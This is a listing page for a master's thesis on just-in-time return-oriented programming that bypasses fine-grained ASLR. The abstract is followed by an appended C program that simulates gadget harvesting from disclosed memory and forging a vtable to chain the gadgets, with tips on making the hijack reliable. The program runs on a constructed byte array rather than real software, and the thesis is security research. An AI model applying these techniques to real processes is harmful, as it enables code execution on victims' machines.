
Runtime Code Reuse Attacks: A Dynamic Framework Bypassing Fine-Grained Address Space Layout Randomization

Posted on: 2015-12-20  Degree: Master  Type: Thesis
Country: China  Candidate: Y Zhuang  Full Text: PDF
GTID: 2308330461960683  Subject: Computer Science and Technology
Abstract/Summary:
With the development of defenses against buffer overflow and format string vulnerabilities, traditional code injection attacks are no longer effective. In this context a new pattern of attack emerged, the code reuse attack. Return-to-libc reuses whole functions in the GNU C library, but the strategy is weak because it is limited to calling existing functions. Hence Shacham introduced return-oriented programming (ROP), which chains together short instruction sequences ending in a ret instruction (called gadgets) that already exist in the application's memory in order to perform a specific computation. Since a traditional ROP attack needs the stack to organize the gadgets into a ROP payload, its limitation is apparent. The key idea of ASLR is to randomize the base addresses of the stack, heap, code and dynamic libraries at load and link time, which offers a plausible defense against these attacks. A drawback of this approach is that not all memory regions are protected by ASLR, and the address space of 32-bit binaries is small, which opens the possibility of probabilistic attacks: ASLR on 32-bit architectures leaves only 16 bits of randomness, so an attacker may attempt a brute-force attack. Defenders have therefore been fortifying their perimeters by designing fine-grained randomization strategies to repel the next generation of attacks. In this thesis we trace the development of fine-grained ASLR, analyze the state of research on ROP attacks and its drawbacks, and set out future work on ROP attacks. Snow first introduced the concept of just-in-time code reuse and implemented it in the form of a framework.

However, he did not give the details of the memory disclosure, and JIT compilation wastes too much time during a code reuse attack. Through memory disclosure, we implement a new variant of code reuse attack in which we gather code chunks and assemble them into the desired payload dynamically from the memory layout while the vulnerable application is running. We then treat a virtual function call as the trampoline, replacing the function addresses in the vtable with the first address of each gadget in the proper sequence, and finally trigger the function call to complete our ROP attack on the fly. We show strong evidence that this variant of ROP attack bypasses existing fine-grained randomization schemes and ROP mitigations. Based on these findings, we argue that fine-grained ASLR strategies still have loopholes, and we hope that our work will inspire others to explore more comprehensive defensive strategies than exist today. We choose popular Windows programs, such as Internet Explorer, as the target vulnerable programs and test our code reuse framework to determine its feasibility and reliability. Finally, we summarize the current influence of defensive strategies, point out flaws in our just-in-time code reuse framework, and explore new solutions and future research directions.
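The runtime step the abstract describes, disclosing code bytes while the target runs, locating gadgets in them, and writing the gadget addresses into a forged vtable in chain order, can be modelled in a short C program. The following is an added example written for this page, not code from the thesis or its framework: the disclosed "code page" is a constructed byte array, `disclose()` is a hypothetical stand-in for a real memory-disclosure bug, the gadget names and the four-gadget chain are illustrative, and the load bases are arbitrary values standing in for ASLR. It harvests `pop r64 ; ret` and `syscall ; ret` gadgets from the disclosed bytes, fills a vtable from them, and checks that the same harvest at a different base still yields a correct chain, which is the property that defeats any payload prepared before the run, whether the randomization is coarse or fine-grained.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample "code page" (x86-64 bytes), offsets relative to its start.
 * Assumption: a real attack reads these bytes from the victim via a disclosure bug. */
static const uint8_t CODE_PAGE[] = {
    0x48, 0x89, 0xc7,       /* mov rdi, rax     filler, no ret   */
    0x5f, 0xc3,             /* pop rdi ; ret    offset 3         */
    0x90, 0x90,             /* nop ; nop                         */
    0x5e, 0xc3,             /* pop rsi ; ret    offset 7         */
    0x48, 0x31, 0xc0,       /* xor rax, rax     filler, no ret   */
    0x58, 0xc3,             /* pop rax ; ret    offset 12        */
    0x0f, 0x05, 0xc3,       /* syscall ; ret    offset 14        */
    0xc3,                   /* ret              offset 17        */
};

/* Hypothetical disclosure primitive: copy n bytes at absolute address addr, the
 * page being mapped at base. Returns -1 rather than read past the region. */
static int disclose(uintptr_t base, uintptr_t addr, uint8_t *out, size_t n)
{
    if (addr < base || addr - base >= sizeof CODE_PAGE ||
        n > sizeof CODE_PAGE - (addr - base))
        return -1;
    memcpy(out, CODE_PAGE + (addr - base), n);
    return 0;
}

struct gadget { const char *name; uintptr_t addr; }; /* addr valid this run only */
#define MAX_GADGETS 16

/* Runtime harvest: scan disclosed bytes for single-byte `pop r64 ; ret`
 * (0x58..0x5F then 0xC3) and `syscall ; ret`. Addresses come from this run's
 * memory, so the result does not depend on where the loader put the code. */
static size_t harvest(uintptr_t base, struct gadget *out, size_t max)
{
    static const char *const pop_names[8] = {
        "pop rax", "pop rcx", "pop rdx", "pop rbx",
        "pop rsp", "pop rbp", "pop rsi", "pop rdi" };
    uint8_t page[sizeof CODE_PAGE];
    size_t n = 0;
    if (disclose(base, base, page, sizeof page) != 0) return 0;
    for (size_t i = 0; i + 1 < sizeof page && n < max; i++) {
        if (page[i] >= 0x58 && page[i] <= 0x5f && page[i + 1] == 0xc3)
            out[n++] = (struct gadget){ pop_names[page[i] - 0x58], base + i };
        else if (i + 2 < sizeof page && page[i] == 0x0f &&
                 page[i + 1] == 0x05 && page[i + 2] == 0xc3)
            out[n++] = (struct gadget){ "syscall", base + i };
    }
    return n;
}

/* Forge the vtable: slot k gets the address of the k-th gadget named in chain,
 * so the hijacked virtual call dispatches into the chain. Fails closed (-1) if a
 * requested gadget is missing; a half-built table would only crash the target. */
static int build_vtable(const struct gadget *found, size_t nfound,
                        const char *const *chain, size_t nslots, uintptr_t *vtable)
{
    for (size_t k = 0; k < nslots; k++) {
        size_t j = 0;
        while (j < nfound && strcmp(found[j].name, chain[k]) != 0) j++;
        if (j == nfound) return -1;
        vtable[k] = found[j].addr;
    }
    return (int)nslots;
}

/* Two simulated runs at different load bases (stand-in for ASLR). Returns 1 when
 * both harvests yield the full chain and every slot moved by exactly the base
 * delta: same offsets, different addresses, so only a chain built from this
 * run's disclosure can be right. */
static int demo(uintptr_t base_a, uintptr_t base_b)
{
    static const char *const chain[] = { "pop rdi", "pop rsi", "pop rax", "syscall" };
    struct gadget ga[MAX_GADGETS], gb[MAX_GADGETS];
    uintptr_t va[4], vb[4];
    size_t na = harvest(base_a, ga, MAX_GADGETS);
    size_t nb = harvest(base_b, gb, MAX_GADGETS);
    if (build_vtable(ga, na, chain, 4, va) != 4 ||
        build_vtable(gb, nb, chain, 4, vb) != 4)
        return 0;
    for (size_t k = 0; k < 4; k++)
        if (vb[k] - va[k] != base_b - base_a) return 0;
    return 1;
}

int main(void)
{
    uintptr_t base = 0x7f3a12340000ULL;   /* arbitrary simulated load base */
    struct gadget g[MAX_GADGETS];
    size_t n = harvest(base, g, MAX_GADGETS);
    for (size_t i = 0; i < n; i++)
        printf("%-8s @ %#lx (offset %lu)\n", g[i].name,
               (unsigned long)g[i].addr, (unsigned long)(g[i].addr - base));
    printf("chain rebuilt at a second base: %s\n", demo(base, base + 0x1000) ? "yes" : "no");
    return 0;
}
```

Build with any C99 compiler on a 64-bit host and run it. The detail worth noticing is that `build_vtable` refuses to emit a table when a requested gadget is absent from the disclosed bytes: in a real framework that check has to run before the virtual call is triggered, because a partially filled vtable crashes the target and wastes the disclosure. The bounds check in `disclose` plays the same role on the read side, since a fault while harvesting ends the attack just as surely.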
Keywords/Search Tags: program security, ROP, just-in-time code reuse, dynamically, fine-grained ASLR